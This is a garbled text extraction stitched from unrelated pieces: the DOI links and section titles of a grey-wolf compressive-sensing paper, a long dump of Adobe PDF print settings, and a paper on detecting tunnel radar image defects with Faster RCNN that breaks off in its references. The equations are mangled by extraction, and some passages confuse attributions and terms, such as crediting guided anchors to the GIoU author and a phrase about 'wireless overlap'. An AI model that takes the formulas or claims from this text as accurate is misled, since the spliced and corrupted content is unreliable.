http://dx.doi.org/10.1109/78.258082 http://dx.doi.org/10.1016/j.acha.2008.07.002 http://dx.doi.org/10.1007/s10208-008-9031-3 http://dx.doi.org/10.1109/tit.2007.909108 http://dx.doi.org/10.7717/peerj-cs.217 https://peerj.com/computer-science/ GWRA: grey wolf based reconstruction algorithm for compressive sensing signals Introduction Problem Formulation Related Research Grey Wolf Optimizer Background Grey Wolf Reconstruction Based Algorithm Simulation Results Conclusion Rferences << /ASCII85EncodePages false /AllowTransparency false /AutoPositionEPSFiles true /AutoRotatePages /None /Binding /Left /CalGrayProfile (Dot Gain 20%) /CalRGBProfile (sRGB IEC61966-2.1) /CalCMYKProfile (U.S. Web Coated \050SWOP\051 v2) /sRGBProfile (sRGB IEC61966-2.1) /CannotEmbedFontPolicy /Warning /CompatibilityLevel 1.4 /CompressObjects /Off /CompressPages true /ConvertImagesToIndexed true /PassThroughJPEGImages true /CreateJobTicket false /DefaultRenderingIntent /Default /DetectBlends true /DetectCurves 0.0000 /ColorConversionStrategy /LeaveColorUnchanged /DoThumbnails false /EmbedAllFonts true /EmbedOpenType false /ParseICCProfilesInComments true /EmbedJobOptions true /DSCReportingLevel 0 /EmitDSCWarnings false /EndPage -1 /ImageMemory 1048576 /LockDistillerParams false /MaxSubsetPct 100 /Optimize true /OPM 1 /ParseDSCComments true /ParseDSCCommentsForDocInfo true /PreserveCopyPage true /PreserveDICMYKValues true /PreserveEPSInfo true /PreserveFlatness true /PreserveHalftoneInfo false /PreserveOPIComments false /PreserveOverprintSettings true /StartPage 1 /SubsetFonts true /TransferFunctionInfo /Apply /UCRandBGInfo /Preserve /UsePrologue false /ColorSettingsFile (None) /AlwaysEmbed [ true ] /NeverEmbed [ true ] /AntiAliasColorImages false /CropColorImages true /ColorImageMinResolution 300 /ColorImageMinResolutionPolicy /OK /DownsampleColorImages false /ColorImageDownsampleType /Average /ColorImageResolution 300 /ColorImageDepth 8 /ColorImageMinDownsampleDepth 1 /ColorImageDownsampleThreshold 1.50000 /EncodeColorImages true /ColorImageFilter /FlateEncode /AutoFilterColorImages false /ColorImageAutoFilterStrategy /JPEG /ColorACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /ColorImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000ColorACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000ColorImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasGrayImages false /CropGrayImages true /GrayImageMinResolution 300 /GrayImageMinResolutionPolicy /OK /DownsampleGrayImages false /GrayImageDownsampleType /Average /GrayImageResolution 300 /GrayImageDepth 8 /GrayImageMinDownsampleDepth 2 /GrayImageDownsampleThreshold 1.50000 /EncodeGrayImages true /GrayImageFilter /FlateEncode /AutoFilterGrayImages false /GrayImageAutoFilterStrategy /JPEG /GrayACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /GrayImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000GrayACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000GrayImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasMonoImages false /CropMonoImages true /MonoImageMinResolution 1200 /MonoImageMinResolutionPolicy /OK /DownsampleMonoImages false /MonoImageDownsampleType /Average /MonoImageResolution 1200 /MonoImageDepth -1 /MonoImageDownsampleThreshold 1.50000 /EncodeMonoImages true /MonoImageFilter /CCITTFaxEncode /MonoImageDict << /K -1 >> /AllowPSXObjects false /CheckCompliance [ /None ] /PDFX1aCheck false /PDFX3Check false /PDFXCompliantPDFOnly false /PDFXNoTrimBoxError true /PDFXTrimBoxToMediaBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXSetBleedBoxToMediaBox true /PDFXBleedBoxToTrimBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXOutputIntentProfile (None) /PDFXOutputConditionIdentifier () /PDFXOutputCondition () /PDFXRegistryName () /PDFXTrapped /False /CreateJDFFile false /Description << /CHS <FEFF4f7f75288fd94e9b8bbe5b9a521b5efa7684002000500044004600206587686353ef901a8fc7684c976262535370673a548c002000700072006f006f00660065007200208fdb884c9ad88d2891cf62535370300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c676562535f00521b5efa768400200050004400460020658768633002> /CHT <FEFF4f7f752890194e9b8a2d7f6e5efa7acb7684002000410064006f006200650020005000440046002065874ef653ef5728684c9762537088686a5f548c002000700072006f006f00660065007200204e0a73725f979ad854c18cea7684521753706548679c300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c4f86958b555f5df25efa7acb76840020005000440046002065874ef63002> /DAN <FEFF004200720075006700200069006e0064007300740069006c006c0069006e006700650072006e0065002000740069006c0020006100740020006f007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e007400650072002000740069006c0020006b00760061006c00690074006500740073007500640073006b007200690076006e0069006e006700200065006c006c006500720020006b006f007200720065006b007400750072006c00e60073006e0069006e0067002e0020004400650020006f007000720065007400740065006400650020005000440046002d0064006f006b0075006d0065006e0074006500720020006b0061006e002000e50062006e00650073002000690020004100630072006f00620061007400200065006c006c006500720020004100630072006f006200610074002000520065006100640065007200200035002e00300020006f00670020006e0079006500720065002e> /DEU <FEFF00560065007200770065006e00640065006e0020005300690065002000640069006500730065002000450069006e007300740065006c006c0075006e00670065006e0020007a0075006d002000450072007300740065006c006c0065006e00200076006f006e002000410064006f006200650020005000440046002d0044006f006b0075006d0065006e00740065006e002c00200076006f006e002000640065006e0065006e002000530069006500200068006f00630068007700650072007400690067006500200044007200750063006b006500200061007500660020004400650073006b0074006f0070002d0044007200750063006b00650072006e00200075006e0064002000500072006f006f0066002d00470065007200e400740065006e002000650072007a0065007500670065006e0020006d00f60063006800740065006e002e002000450072007300740065006c006c007400650020005000440046002d0044006f006b0075006d0065006e007400650020006b00f6006e006e0065006e0020006d006900740020004100630072006f00620061007400200075006e0064002000410064006f00620065002000520065006100640065007200200035002e00300020006f0064006500720020006800f600680065007200200067006500f600660066006e00650074002000770065007200640065006e002e> /ESP <FEFF005500740069006c0069006300650020006500730074006100200063006f006e0066006900670075007200610063006900f3006e0020007000610072006100200063007200650061007200200064006f00630075006d0065006e0074006f0073002000640065002000410064006f0062006500200050004400460020007000610072006100200063006f006e00730065006700750069007200200069006d0070007200650073006900f3006e002000640065002000630061006c006900640061006400200065006e00200069006d0070007200650073006f0072006100730020006400650020006500730063007200690074006f00720069006f00200079002000680065007200720061006d00690065006e00740061007300200064006500200063006f00720072006500630063006900f3006e002e002000530065002000700075006500640065006e00200061006200720069007200200064006f00630075006d0065006e0074006f00730020005000440046002000630072006500610064006f007300200063006f006e0020004100630072006f006200610074002c002000410064006f00620065002000520065006100640065007200200035002e003000200079002000760065007200730069006f006e0065007300200070006f00730074006500720069006f007200650073002e> /FRA <FEFF005500740069006c006900730065007a00200063006500730020006f007000740069006f006e00730020006100660069006e00200064006500200063007200e900650072002000640065007300200064006f00630075006d0065006e00740073002000410064006f00620065002000500044004600200070006f007500720020006400650073002000e90070007200650075007600650073002000650074002000640065007300200069006d007000720065007300730069006f006e00730020006400650020006800610075007400650020007100750061006c0069007400e90020007300750072002000640065007300200069006d007000720069006d0061006e0074006500730020006400650020006200750072006500610075002e0020004c0065007300200064006f00630075006d0065006e00740073002000500044004600200063007200e900e90073002000700065007500760065006e0074002000ea0074007200650020006f007500760065007200740073002000640061006e00730020004100630072006f006200610074002c002000610069006e00730069002000710075002700410064006f00620065002000520065006100640065007200200035002e0030002000650074002000760065007200730069006f006e007300200075006c007400e90072006900650075007200650073002e> /ITA <FEFF005500740069006c0069007a007a006100720065002000710075006500730074006500200069006d0070006f007300740061007a0069006f006e00690020007000650072002000630072006500610072006500200064006f00630075006d0065006e00740069002000410064006f006200650020005000440046002000700065007200200075006e00610020007300740061006d007000610020006400690020007100750061006c0069007400e00020007300750020007300740061006d00700061006e0074006900200065002000700072006f006f0066006500720020006400650073006b0074006f0070002e0020004900200064006f00630075006d0065006e007400690020005000440046002000630072006500610074006900200070006f00730073006f006e006f0020006500730073006500720065002000610070006500720074006900200063006f006e0020004100630072006f00620061007400200065002000410064006f00620065002000520065006100640065007200200035002e003000200065002000760065007200730069006f006e006900200073007500630063006500730073006900760065002e> /JPN <FEFF9ad854c18cea51fa529b7528002000410064006f0062006500200050004400460020658766f8306e4f5c6210306b4f7f75283057307e30593002537052376642306e753b8cea3092670059279650306b4fdd306430533068304c3067304d307e3059300230c730b930af30c830c330d730d730ea30f330bf3067306e53705237307e305f306f30d730eb30fc30d57528306b9069305730663044307e305930023053306e8a2d5b9a30674f5c62103055308c305f0020005000440046002030d530a130a430eb306f3001004100630072006f0062006100740020304a30883073002000410064006f00620065002000520065006100640065007200200035002e003000204ee5964d3067958b304f30533068304c3067304d307e30593002> /KOR <FEFFc7740020c124c815c7440020c0acc6a9d558c5ec0020b370c2a4d06cd0d10020d504b9b0d1300020bc0f0020ad50c815ae30c5d0c11c0020ace0d488c9c8b85c0020c778c1c4d560002000410064006f0062006500200050004400460020bb38c11cb97c0020c791c131d569b2c8b2e4002e0020c774b807ac8c0020c791c131b41c00200050004400460020bb38c11cb2940020004100630072006f0062006100740020bc0f002000410064006f00620065002000520065006100640065007200200035002e00300020c774c0c1c5d0c11c0020c5f40020c2180020c788c2b5b2c8b2e4002e> /NLD (Gebruik deze instellingen om Adobe PDF-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. De gemaakte PDF-documenten kunnen worden geopend met Acrobat en Adobe Reader 5.0 en hoger.) /NOR <FEFF004200720075006b00200064006900730073006500200069006e006e007300740069006c006c0069006e00670065006e0065002000740069006c002000e50020006f0070007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740065007200200066006f00720020007500740073006b00720069006600740020006100760020006800f800790020006b00760061006c00690074006500740020007000e500200062006f007200640073006b0072006900760065007200200065006c006c00650072002000700072006f006f006600650072002e0020005000440046002d0064006f006b0075006d0065006e00740065006e00650020006b0061006e002000e50070006e00650073002000690020004100630072006f00620061007400200065006c006c00650072002000410064006f00620065002000520065006100640065007200200035002e003000200065006c006c00650072002000730065006e006500720065002e> /PTB <FEFF005500740069006c0069007a006500200065007300730061007300200063006f006e00660069006700750072006100e700f50065007300200064006500200066006f0072006d00610020006100200063007200690061007200200064006f00630075006d0065006e0074006f0073002000410064006f0062006500200050004400460020007000610072006100200069006d0070007200650073007300f5006500730020006400650020007100750061006c0069006400610064006500200065006d00200069006d00700072006500730073006f0072006100730020006400650073006b0074006f00700020006500200064006900730070006f00730069007400690076006f0073002000640065002000700072006f00760061002e0020004f007300200064006f00630075006d0065006e0074006f00730020005000440046002000630072006900610064006f007300200070006f00640065006d0020007300650072002000610062006500720074006f007300200063006f006d0020006f0020004100630072006f006200610074002000650020006f002000410064006f00620065002000520065006100640065007200200035002e0030002000650020007600650072007300f50065007300200070006f00730074006500720069006f007200650073002e> /SUO <FEFF004b00e40079007400e40020006e00e40069007400e4002000610073006500740075006b007300690061002c0020006b0075006e0020006c0075006f0074002000410064006f0062006500200050004400460020002d0064006f006b0075006d0065006e007400740065006a00610020006c0061006100640075006b006100730074006100200074007900f6007000f60079007400e400740075006c006f0073007400750073007400610020006a00610020007600650064006f007300740075007300740061002000760061007200740065006e002e00200020004c0075006f0064007500740020005000440046002d0064006f006b0075006d0065006e00740069007400200076006f0069006400610061006e0020006100760061007400610020004100630072006f0062006100740069006c006c00610020006a0061002000410064006f00620065002000520065006100640065007200200035002e0030003a006c006c00610020006a006100200075007500640065006d006d0069006c006c0061002e> /SVE <FEFF0041006e007600e4006e00640020006400650020006800e4007200200069006e0073007400e4006c006c006e0069006e006700610072006e00610020006f006d002000640075002000760069006c006c00200073006b006100700061002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740020006600f600720020006b00760061006c00690074006500740073007500740073006b0072006900660074006500720020007000e5002000760061006e006c00690067006100200073006b0072006900760061007200650020006f006300680020006600f600720020006b006f007200720065006b007400750072002e002000200053006b006100700061006400650020005000440046002d0064006f006b0075006d0065006e00740020006b0061006e002000f600700070006e00610073002000690020004100630072006f0062006100740020006f00630068002000410064006f00620065002000520065006100640065007200200035002e00300020006f00630068002000730065006e006100720065002e> /ENU (Use these settings to create Adobe PDF documents for quality printing on desktop printers and proofers. Created PDF documents can be opened with Acrobat and Adobe Reader 5.0 and later.) >> /Namespace [ (Adobe) (Common) (1.0) ] /OtherNamespaces [ << /AsReaderSpreads false /CropImagesToFrames true /ErrorControl /WarnAndContinue /FlattenerIgnoreSpreadOverrides false /IncludeGuidesGrids false /IncludeNonPrinting false /IncludeSlug false /Namespace [ (Adobe) (InDesign) (4.0) ] /OmitPlacedBitmaps false /OmitPlacedEPS false /OmitPlacedPDF false /SimulateOverprint /Legacy >> << /AddBleedMarks false /AddColorBars false /AddCropMarks false /AddPageInfo false /AddRegMarks false /ConvertColors /NoConversion /DestinationProfileName () /DestinationProfileSelector /NA /Downsample16BitImages true /FlattenerPreset << /PresetSelector /MediumResolution >> /FormElements false /GenerateStructure true /IncludeBookmarks false /IncludeHyperlinks false /IncludeInteractive false /IncludeLayers false /IncludeProfiles true /MultimediaHandling /UseObjectSettings /Namespace [ (Adobe) (CreativeSuite) (2.0) ] /PDFXOutputIntentProfileSelector /NA /PreserveEditing true /UntaggedCMYKHandling /LeaveUntagged /UntaggedRGBHandling /LeaveUntagged /UseDocumentBleed false >> ] >> setdistillerparams << /HWResolution [2400 2400] /PageSize [612.000 792.000] >> setpagedevice work_dwgtwxbuv5frtgrviz2ypnjcqu ---- International Journal of Advanced Network, Monitoring and Controls Volume 05, No.01, 2020 DOI: 10.21307/ijanmc-2020-007 44 Research on the Tunnel Geological Radar Image Flaw Detection Based on CNN Li He School of Computer Science and Engineering Xi’an Technological University Xi’an, China E-mail: 1003294436@qq.com Wang Yubian Department of Railway Transportation Control Belarusian State University of Transport 34, Kirova street, Gomel, 246653 Republic of Belarus E-mail: alika_wang@mail.ru Abstract—Tunnel geological radar image has been widely used in tunnel engineering quality detection for its advantages of fast, nondestructive, continuous detection, real-time imaging, intuitive data processing and high detection accuracy. However, the traditional defect detection method, which is judged by surveyors visually, consumes energy. In order to detect the quality of tunnel engineering accurately and quickly, an improved method of void defect detection based on Faster RCNN (Regional Convolutional Neural Network) is proposed in depth learning. The image data of the tunnel geological radar is collected for annotation, which fills the blank of the defect data set in the tunnel engineering. Through the method of this paper proposed, the feature extraction is optimized to improve the performance of the detection model, and the detection accuracy of the model is verified by expert knowledge. Keywords-Tunnel Geological; Radar Image; Flaw Detection; CNN I. INTRODUCTION There are a large number of tunnel projects in the construction project. The quality defects of the tunnel may affect the construction schedule, increase the engineering cost, damage the mechanical equipment and even endanger the lives of the constructor. Geological radar detection method[1-2] is the mainstream method of tunnel lining detection at present, and has excellent performance in the detection of reinforcement and arch spacing, plain concrete structure, etc.[3]. However, the traditional survey situation is that the site construction surveyors scan the survey images generated by radar equipment one by one according to their expert knowledge. This traditional method has a large workload, a large human factor, and a certain rate of omission and error. In recent years, with the continuous improvement of GPU, the field of deep learning is booming. In 2006, Hinton[4] and other researcher proposed the concept of deep learning, using convolutional neural network (CNN) to learn features from data. In 2012, in the ImageNet image classification competition, Alex Krizhevsky's team proposed the deep convolutional neural network AlexNet for the first time. AlexNet won the champion with an accuracy rate of 15.3% higher than the second place, which made people have a further understanding of the application of convolutional neural network in visual tasks. Girshick R proposed the regional convolutional neural network (RCNN) model, which USES the Selective Search method to select candidate regions and USES multiple International Journal of Advanced Network, Monitoring and Controls Volume 05, No.01, 2020 45 support vector machines to classify features, thus achieving target detection. In 2015, Girshick R proposed Fast RCNN[6], which is an improved version of RCNN and adopts RoI Pooling to share the parts with a large amount of calculation to improve the working efficiency of the whole model. Later, Ren improved again on the basis of the original network, introduced RPN layer, and designed a Faster RCNN model[7], aiming at the problem that the running time of extracting candidate feature regions was slow, which achieved good results. Compared with artificially designed features, features extracted by convolutional neural network have better robustness and stronger semantic information, and great achievements have been made in computer vision fields such as face recognition[8-9], target detection, and speech recognition[10-11]. This paper selects Faster RCNN network as the basic algorithm framework for tunnel GPR (Ground Penetrating Radar) detection. The framework of Faster RCNN network is introduced. However, if the original Faster RCNN model is directly applied to the tunnel GPR detection in the actual scene, there may be two disadvantages: 1) The data sets collected on site for training are relatively small, which may lead to incomplete learning of the learning model and easy over fitting[12]. 2) There are many interference factors in the tunnel, resulting in complex image features of the defect. At the same time, the radar images are all manually experienced by field surveyors, and there is no uniform standard, so the sharpness is quite different. It will cause RPN to produce more negative sample space, and the network model is difficult to converge[13]. Based on the above reasons, this paper proposed Faster - RCNN model to expand original data sets, based on the data increase[14] and combining with GA – RPN[15] for an improvement in the target detection and evaluation index in GIoU on border regression optimization[16], in order to overcome the above shortcomings, further improve the accuracy of tunnel geological radar image detection. II. KEY TECHNOLOGIES AND EQUIPMENT As a relatively mature geophysical prospecting method, geological radar method has the advantages of high resolution, fast detection speed, non-destructive and radar image visualization, etc., and has become the most important method for tunnel lining quality detection. There are obvious abnormal reactions to the defects of tunnel lining, such as local un-compactness, voidage, insufficient thickness and lack of reinforcement. A. Technical principle Different defects have different reflections in radar images. The electromagnetic waves emitted by GPR will generate reflection and refraction on the surface of the medium with different dielectric constants[17]. The dielectric constants of common materials are shown in table 1 below. TABLE I. DIELECTRIC CONSTANTS OF COMMON MATERIALS Material Dielectric constant Velocity (mm/ns) atmosphere 1 300 water 81 30 concrete 5-8 55-120 Sand (dry) 3-6 120-170 Sand (wet) 25-30 55-60 pitch 3-5 134-173 International Journal of Advanced Network, Monitoring and Controls Volume 05, No.01, 2020 46 Reflection and refraction conform to the law of reflection and refraction. The energy of reflected wave and refracted wave depends on the reflection coefficient R and refracted coefficient T: 21 21     R (1) In the above equation, ε1 and ε2 are the relative permittivity of the upper and lower media at the interface respectively. According to Formula (1), when the electromagnetic wave propagates to the interface with dielectric constant difference, the reflected electromagnetic wave energy will change, which is reflected in the radar image as positive and anti-peak anomalies. The defects in lining such as local un-compaction, voidage, insufficient thickness and lack of reinforcement have obvious dielectric differences with concrete, which provide a good geophysical foundation for the application of GPR. B. Equipment The equipment of detection equipment of GPR system in the project is shown in Figure 1. Figure 1. GPR system detection equipment Geological ground penetrating radar method is the use of high frequency electromagnetic wave transmitting antenna will be in the form of a pulse in the concrete surface emission to concrete, the concrete interface reflection and defects return to the surface, by the receiving antenna to receive the echo signal, the treatment of radar system, radar image, through the analysis of the radar image processing, the interpretation of the data on the basis of this, so as to achieve quality nondestructive testing of lining. Its detection principle is shown in Figure 2. Figure 2. Principles of geological radar detection International Journal of Advanced Network, Monitoring and Controls Volume 05, No.01, 2020 47 C. The Radar imaging profile Profiles of GPR images are usually recorded in the form of pulse reflected waves, or in the form of gray or color profiles. In this way, the in-phase axis or the iso-gray line can be used to represent the underground reflector or the target body. On the waveform recording chart, waveforms are recorded in the vertical direction of the survey line at all measurement points, forming the radar imaging profile. In the tunnel lining detection, the voids mainly appear between the inner lining, the second lining and the surface layer. Due to the large dielectric difference between the void and surrounding media, when the electromagnetic wave propagates between concrete and atmosphere, air and surrounding rock, it will generate two strong reflections at the upper and lower interfaces. Because the electromagnetic wave in the air attenuation is small, and the concrete and air dielectric difference is large, so in the void to produce a strong multiple reflections, electromagnetic wave in the air medium propagation frequency is relatively high. At the upper interface of voids, the electromagnetic wave goes from concrete to the air medium. According to the law of reflection (Formula 1), the reflection coefficient is positive, showing a negative wave peak. At the gap interface, the reflection coefficient of electromagnetic wave from air to concrete medium is negative, showing a positive wave peak. The picture is as shown in Figure 3. In the image, white is the strongest color of positive reflection and black is the strongest color of negative reflection. In theory, there is a gap defect and the radar image shows two sets of reflected signals. In the actual survey, the second reflection signal may be lost due to signal interference. Figure 3. GPR image of tunnel ejection III. CONVOLUTIONAL NEURAL NETWORKS Convolutional Neural Networks (CNN) can use local operations to abstract the representations in a hierarchical way in image recognition [18]. Two key design ideas have driven the success of convolution architecture in computer vision. First, CNN USES the 2D structure of the image, and the pixels in adjacent areas are usually highly correlated. Therefore, instead of using one-to-one connections between all pixel units (as most neural networks do), CNN can use local connections in packets. Second, the CNN architecture relies on feature sharing, so each channel (that is, the output feature graph) is generated by convolution with the same filter at all locations. Deep learning methods of convolutional neural network are mainly divided into single-stage (eg.SDD, YOLO) and two-stage (eg.RCNN series). Single-stage generates detections directly on the picture through International Journal of Advanced Network, Monitoring and Controls Volume 05, No.01, 2020 48 calculation. Two-stage extracts the proposal first, and then makes the second amendment based on the proposal. Both are relatively single-stage fast, low precision. In this paper, it is proposed to use two-stage Faster RCNN because of the high accuracy of two-stage[19]. This paper adopts Faster RCNN as the basic framework, as shown in Figure 4. In fact, Faster RCNN can be divided into four main contents: Conv layers 隧道地质雷达图像 classifier RoI pooling Feature maps proposals Region Proposal Network 隧道地质雷达图像 Figure 4. Structure chart Faster RCNN 1) Convolutional layers. It is used to extract the features of un-blemishes on the GPR image. The input is the whole image and the output is the extracted features, which are called feature maps. 2) Region Proposal Network. It is used to recommend candidate regions; this network is used in place of the previous search selective. The input is an image (because the RPN network and Fast RCNN share the same CNN here, so the input can also be considered feature maps), and the output is multiple candidate areas to filter out gaps in features and = perform a preliminary border regression. It shares the convolution feature of the whole graph with the detection network, solves the speed bottleneck of the original selective search method, and greatly improves the speed of target detection. 3) RoI pooling. Its function is input different sizes and converted into output of fixed length, and the input and output are the same as RoI pooling in Faster RCNN. 4) Classification and regression. The output of this layer is the class of the fully connected neural network of candidate region, and the exact location of the candidate region in the image. The whole process is shown in Figure 5. International Journal of Advanced Network, Monitoring and Controls Volume 05, No.01, 2020 49 Figure 5. Structure chart of RPN IV. GENERATING ANCHOR -RPN Regional Anchor is an important cornerstone of target detection method at present. Most good target detection algorithms rely on the Anchors mechanism to evenly sample a given location in space with predefined sizes. There are two major problems in the process of generating Anchor by the traditional two-stage anchor-based method: 1) Inefficient is low. The existing method makes sliding Windows on the feature map and generates thousands of anchors. However, there are only a few objects in one picture, which leads too many negative samples. 2) Unreasonable a priori assumptions. When generating Anchor, it is assumed that the scale of Anchor or the length-width ratio is several fixed values. These values tend to change and change with the dataset. According to the above Hamid Rezatofighi proposed the guided anchor in 2019. The Guided anchor mechanism works as follows: the position and shape of the target can be represented by (x, y, w, h). (x, y) represents the coordinates of the object's position in space. If the box of the object is drawn on a given input picture, the following distribution can be obtained:      IyxhwpIyxpIhwyxp ,,|,|,|,,,  (2) There are two important information can be obtained from the above equation: (1) the specific region of the object in the image; (2) the size and proportion of the object are closely related to its location. The anchor generated model is therefore designed to contain two branches: one for positioning and one for shape prediction. A. Anchor generation modules. That is position prediction module. The goal is to predict which regions should be used as the center points to generate the anchor, which is a dichotomy problem, to predict whether or not the object is the center. Two branches were added to predict the confidence of each pixel (corresponding receptive field) on the feature graph, as well as the corresponding width and height. A target is considered a target if its confidence is greater than a specific domain value. Obviously, the process of obtaining this proposal is different from that of sliding window, which can reduce a large number of negative samples (only one proposal can be generated by making more pixels on each Feature map). In addition, since the width and height are also regressed by CNN, there is no scale for the object, and International Journal of Advanced Network, Monitoring and Controls Volume 05, No.01, 2020 50 the width and height are compared to any prior assumptions. B. Feature adaption modules. This module actually quotes from the idea of deformable convolution. Firstly, the width and height of each point can be obtained by using the Anchor generation module. The width and height are represented by a 2-channel characteristic graph, and then the offset field is obtained by convolving again on the 2-channel characteristic graph. Finally, the offset field is applied to the characteristic graph. V. IMPROVE IOU ALGORITHM In the target detection, it depends on the regression of boundingbox coordinates to obtain accurate positioning effect. IoU (Intersection-over-Union) is an important concept in target detection. In the anchor-based method, it is not only used to determine positive samples and negative samples, but also to evaluate the distance between the predictbox and ground-truth, or the accuracy of the predictbox. One of the better features about the IoU is that it's scale insensitive. In the regression task, the most direct indicator to judge the distance between predict box and gt is the IoU, but the loss used is not suitable. Since loss cannot reflect the regression effect, IoU can get different values according to different situations, which can most directly reflect the regression effect. But there are two problems with using IoU directly as the loss function: A. If the two boxes do not intersect, by definition, IoU=0, it does not reflect the distance between them. At the same time, because loss=0, there is no gradient return, no learning and training. B. The IoU cannot accurately reflect the degree of coincidence between the two. As shown in figure 6 below, IoU is equal in all three cases, but their coincidence degree is different. The graph on the left has the best regression effect, while the graph on the right has the worst. Figure 6. Same border regression of IoU To solve the above problems, Rezatofighi, Hamid and other researcher proposed GIoU in 2019, and its algorithm formula for GIoU is as follows: Algorithm 1: Generalized Intersection over Union Input：Two Random image: n RSBA ， Output：GIoU 1. Find the smallest target graph C that surrounds A and B，C satisfies the condition: n RSC  2. BA BA IoU    3.   C BAC IoUoUGI   \ International Journal of Advanced Network, Monitoring and Controls Volume 05, No.01, 2020 51 C. Characteristics of GIoU 1) Similar to IoU, GIoU is also a distance measure. As a loss function, L_{GIoU}=1-GIoU, which meets the basic requirements of the loss function. 2) GIoU is Insensitive to scale. 3) GIoU is the lower bound on IoU, and in the case of wireless overlap between the two boxes, IoU=GIoU. 4) The value of IoU is [0,1], but the value range of GIoU is symmetric [-1,1]. According to the above formula, it can be seen that GIoU is always less than or equal to IoU. In addition, for IoU, its range is [0,1], while the range of GIoU is [−1,1]. When the two shapes coincide completely, there is GIoU=IoU=1. When there is no overlap between the two shapes, IoU= 0, and the subtraction is -1. 5) Unlike the IoU, which only focuses on the overlapping area, the GIoU not only focuses on the overlapping area, but also focuses on other non-overlapping areas, which can better reflect the coincidence degree of the two. Since GIoU introduces C containing two shapes of A and B, it can still be optimized when A and B do not coincide. VI. EXPERIMENTAL METHODS A. Data to enhance Compared with traditional images, the number of GDAR images that can provide deep learning training is generally less, and the lack of data will lead to over fitting of the model. In order to ensure the generalization ability and recognition effect of the model after training, it is more important to improve the training performance of the deep learning method by means of data augmentation. The small manually labeled data set was taken as the initial sample, and the initial sample set was rotated and compound rotated, and all the operation results obtained were taken as the training data set after data enlargement. B. Training methods After the data enhancement, the images of plain concrete and reinforced concrete were sent into the neural network to start the training model. Faster - RCNN model training method using alternate optimization method (alternating optimization), it is divided into four steps. 1) Stage1_rpn_train.pt RPN network was trained separately, and the trained void model was initialized with the model of ImageNet, and the parameters were adjusted in an end to end manner. backbone+rpn+fast rcnn——>backbone1+rpn1+fast rcnn, backbone, rpn, parameter updating; 2) Stage1_fast_rcnn_train.pt Fast RCNN is a separate training detection network. Proposals for training come from RPN net in step 1. The model initialization adopts the ImageNet model. backbone+rpn1+fast rcnn——>backbone2+rpn1+fast rcnn1, backbone, fast rcnn, parameter updating; 3) Stage2_rpn_train.pt The RPN model was initialized with the parameters of the second step Fast Rcnn, but the convolutional layer was fixed during the training and only the parameters belonging to RPN were adjusted. backbone2+rpn1+fast rcnn1——>backbone2+rpn2+fast rcnn1, rpn, parameter updating; 4) Stage2_fast_rcnn_train.pt Keep the Shared convolutional layer fixed; fine-tune the remaining parameters of Fast rcnn with the proposals of the RPN output adjusted in step 3 as input. Backbone2+rpn2+fast rcnn1 backbone2+rpn2 + fast rcnn2, fast rcnn, parameter updating. The above four steps are shown in figure 7. International Journal of Advanced Network, Monitoring and Controls Volume 05, No.01, 2020 52 Figure 7. Network model training process C. Evaluation index The general formula for calculating the accuracy is: the number/total number of accurate classification ×100% [20]. This paper uses traditional evaluation criteria Accuracy: ACC= (TP+TN)/ (TP+TN+FP+FN) Precision: P= TP/ (TP+FP), the proportion of positive classes in the results after classification. Recall: RECALL=TP/(TP+FN), the proportion of all positive examples divided into pairs. TP means that the positive sample is correctly identified as a positive sample. TN means that negative samples are correctly identified as negative samples. FP indicates that a negative sample is incorrectly identified as a positive sample. FN means that a positive sample is incorrectly identified as a negative sample. The identification criteria for identification of void in the tunnel lining in the image are defined as the type and location of void. The probability size and the coincidence degree of the identification box and the marker box are determined as empty. Through the analysis of the sample situation, if the probability of the defect of the Geology radar image and the GIoU reach more than 50%, the gap will be recognized. VII. CONCLUSION In tunnel construction, geological radar is used to detect highway tunnel engineering, and the radar scanning result map can be used to realize advanced geological forecast, and the hidden danger of geological defects in the tunnel can be found. Based on the analysis of the elation principle, a method based on Faster RCNN is proposed in this paper to extract the position of the elation in the second lining. Compared with the traditional identification method, this method has the characteristics of Faster and higher accuracy. Since this data set is only plain concrete and reinforced concrete, the scale of annotated data will be further expanded to enrich the diversity of samples to improve the performance of the model. REFERENCES [1] Li Wendi. Analysis of GPR image features of tunnel lining defects. [J]. Fujian Building Materials, 2019(01):22-24. [2] Zhang Chi. Research on detection of lining voids of reinforced concrete structures based on geological radar method [J]. Railway survey, 2018, 44 (03):35-38. [3] Liu Jinlong, Tan hailiang. Application of geological radar in detecting soil defects [J]. Engineering quality, 2018, 36 (01):73-75. [4] Hinton G E, Osindero S, Teh Y. A fast learning algorithm for deep belief nets [J]. Neural Computation, 2006, 18: 1527-1554. International Journal of Advanced Network, Monitoring and Controls Volume 05, No.01, 2020 53 [5] Krizhevsky A, Sutskeever I, Hinton G E. ImageNet classification with deep convolutional neural networks [J]. Communications of the Acm, 2012, 60(2): 1097-1105. [6] Girshick R. Fast R-CNN[C]//2015 IEEE International Conference on Computer Vision (ICCV), December 7-13, 2015, Santiago, Chile. New York: IEEE, 2015: 1440-1448. [7] Ren S, He K, Girshick R, et al. Faster R-CNN: towards real time object detection with region proposal networks[J]. IEEE Transactions on Pattern Analysis and Machine Intelligence, 2017, 39(6): 1137-1149. [8] Sun Y, Liang D, Wang X G, et al. DeepID3: face recognition with very deep neural networks [J]. Computer Science, 2015, 2(3): 1-5. [9] Luiz G H, 